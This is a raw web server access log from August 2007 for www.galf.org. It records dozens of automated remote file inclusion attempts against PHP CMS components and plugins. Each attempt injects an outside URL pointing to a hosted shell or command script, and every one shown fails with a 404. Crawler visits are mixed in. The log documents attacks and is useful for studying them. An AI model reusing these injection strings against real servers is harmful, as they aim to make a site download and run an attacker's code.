70.42.186.129 - - [05/Aug/2007:19:52:28 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 131072 "-" "Mozilla/5.0 (Windows;) NimbleCrawler 2.0.1 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:19:55:14 -0700] "GET /logs/index.php?open=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
72.232.183.154 - - [05/Aug/2007:19:55:14 -0700] "GET /index.php?open=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
168.103.115.245 - - [05/Aug/2007:19:55:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:20:03:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.222.124.126 - - [05/Aug/2007:20:04:46 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.222.124.126 - - [05/Aug/2007:20:04:46 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.27.164.50 - - [05/Aug/2007:20:06:07 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.27.164.50 - - [05/Aug/2007:20:06:07 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:20:07:13 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.246.77 - - [05/Aug/2007:20:07:48 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.75.246.77 - - [05/Aug/2007:20:07:49 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
88.191.39.142 - - [05/Aug/2007:20:16:34 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:20:16:34 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.27.164.50 - - [05/Aug/2007:20:19:17 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.27.164.50 - - [05/Aug/2007:20:19:20 -0700] "GET /logs/access_070723.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
38.114.104.57 - - [05/Aug/2007:20:20:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
38.114.104.42 - - [05/Aug/2007:20:20:20 -0700] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
38.114.104.42 - - [05/Aug/2007:20:26:17 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
38.114.104.42 - - [05/Aug/2007:20:26:30 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
76.209.77.166 - - [05/Aug/2007:20:28:41 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.209.77.166 - - [05/Aug/2007:20:28:41 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:33:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:33:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
76.209.77.166 - - [05/Aug/2007:20:34:13 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.209.77.166 - - [05/Aug/2007:20:34:13 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.179.211.212 - - [05/Aug/2007:20:34:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.179.211.212 - - [05/Aug/2007:20:34:50 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:35:01 -0700] "GET /logs/access_070730.log//components/com_simpleboard/image_upload.php?sbp=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:35:05 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
212.158.216.234 - - [05/Aug/2007:20:35:05 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:38:06 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:38:06 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:39:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
67.19.26.66 - - [05/Aug/2007:20:39:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:43:06 -0700] "GET /logs/access_070730.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:20:45:59 -0700] "GET /logs/access_070716.log//admin/admin_styles.php?phpbb_root_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
212.158.216.234 - - [05/Aug/2007:20:49:41 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.19.80 - - [05/Aug/2007:20:50:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.105 - - [05/Aug/2007:20:50:08 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.150.127.148 - - [05/Aug/2007:20:50:35 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.150.127.148 - - [05/Aug/2007:20:50:42 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.26.75 - - [05/Aug/2007:20:52:06 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:56:25 -0700] "GET /logs/access_070723.log/4nAlbum/public/displayCategory.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:56:26 -0700] "GET /4nAlbum/public/displayCategory.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:56:26 -0700] "GET /logs/4nAlbum/public/displayCategory.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:20:56:39 -0700] "GET /logs/access_070716.log/4nAlbum/public/displayCategory.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
91.150.127.148 - - [05/Aug/2007:21:00:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.150.127.148 - - [05/Aug/2007:21:00:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.230.99.230 - - [05/Aug/2007:21:06:42 -0700] "GET / HTTP/1.1" 200 1048 "http://www.rompiendoelsilencio.cl/sitiosamigos/_sitiosamigos.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
201.230.99.230 - - [05/Aug/2007:21:06:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:21:09:37 -0700] "GET /logs/access_070730.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
212.158.216.234 - - [05/Aug/2007:21:09:38 -0700] "GET /logs/access_070716.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.222.124.126 - - [05/Aug/2007:21:09:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.222.124.126 - - [05/Aug/2007:21:09:43 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.197.226.50 - - [05/Aug/2007:21:18:02 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/evilxxx/evil? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
208.197.226.50 - - [05/Aug/2007:21:18:05 -0700] "GET /index.php?go=http://www.freewebtown.com/evilxxx/evil? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
216.55.133.106 - - [05/Aug/2007:21:18:05 -0700] "GET /logs/announcements.php?phpraid_dir=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.55.133.106 - - [05/Aug/2007:21:18:05 -0700] "GET /announcements.php?phpraid_dir=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.158.216.234 - - [05/Aug/2007:21:22:48 -0700] "GET /logs/access_070730.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.98.88.114 - - [05/Aug/2007:21:27:10 -0700] "GET /logs/access_070226.log/http:/4ck.me.uk/safe.txt?=%22http://www.geocities.com/gue_plur/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:21:27:56 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:21:27:57 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
208.179.211.212 - - [05/Aug/2007:21:28:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.179.211.212 - - [05/Aug/2007:21:28:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.19.26.66 - - [05/Aug/2007:21:29:37 -0700] "GET /logs/index2.php?content=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.26.66 - - [05/Aug/2007:21:29:37 -0700] "GET /index2.php?content=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.29.42 - - [05/Aug/2007:21:38:37 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:21:39:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:21:39:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.45.96.13 - - [05/Aug/2007:21:40:43 -0700] "GET /logs/index.php?go=http://www.corkingwines.com/templates/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.45.96.13 - - [05/Aug/2007:21:40:43 -0700] "GET /index.php?go=http://www.corkingwines.com/templates/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
168.103.115.245 - - [05/Aug/2007:21:41:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.25.205 - - [05/Aug/2007:21:41:57 -0700] "GET /logs/access_070716.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.146.251.117 - - [05/Aug/2007:21:42:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xplz.xpg.com.br/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
168.103.115.245 - - [05/Aug/2007:21:42:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.146.251.117 - - [05/Aug/2007:21:43:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.xplz.xpg.com.br/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
216.27.9.82 - - [05/Aug/2007:21:45:30 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
211.239.157.232 - - [05/Aug/2007:21:46:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.239.157.232 - - [05/Aug/2007:21:46:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:21:53:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:21:53:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:00:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:00:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:06:16 -0700] "GET /logs/index2.php?=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:06:17 -0700] "GET /index2.php?=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
211.239.157.232 - - [05/Aug/2007:22:09:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.239.157.232 - - [05/Aug/2007:22:09:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
161.58.46.218 - - [05/Aug/2007:22:12:09 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:12:27 -0700] "GET /logs/access_070730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.183.154 - - [05/Aug/2007:22:12:27 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forek.slubice.net.pl/mambo/administrator/components/com_serverstat/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.64.34.133 - - [05/Aug/2007:22:13:58 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.103.115.245 - - [05/Aug/2007:22:15:07 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.168 - - [05/Aug/2007:22:15:19 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:18:04 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.55 - - [05/Aug/2007:22:18:04 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:18:20 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:18:20 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:18:35 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:18:35 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.58.46.218 - - [05/Aug/2007:22:21:21 -0700] "GET /modules/My_eGallery/index.php?basepath=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:22:21:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:22:21:47 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:22:21:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
69.64.34.133 - - [05/Aug/2007:22:21:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.168 - - [05/Aug/2007:22:23:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
168.103.115.245 - - [05/Aug/2007:22:24:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:22:24:15 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:24:46 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:24:47 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.208.65 - - [05/Aug/2007:22:24:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.208.65 - - [05/Aug/2007:22:24:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.28.112.55 - - [05/Aug/2007:22:24:58 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:24:58 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.20.102 - - [05/Aug/2007:22:27:21 -0700] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:28:18 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:28:19 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:22:29:03 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:22:29:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:22:31:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.65.146.138 - - [05/Aug/2007:22:31:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
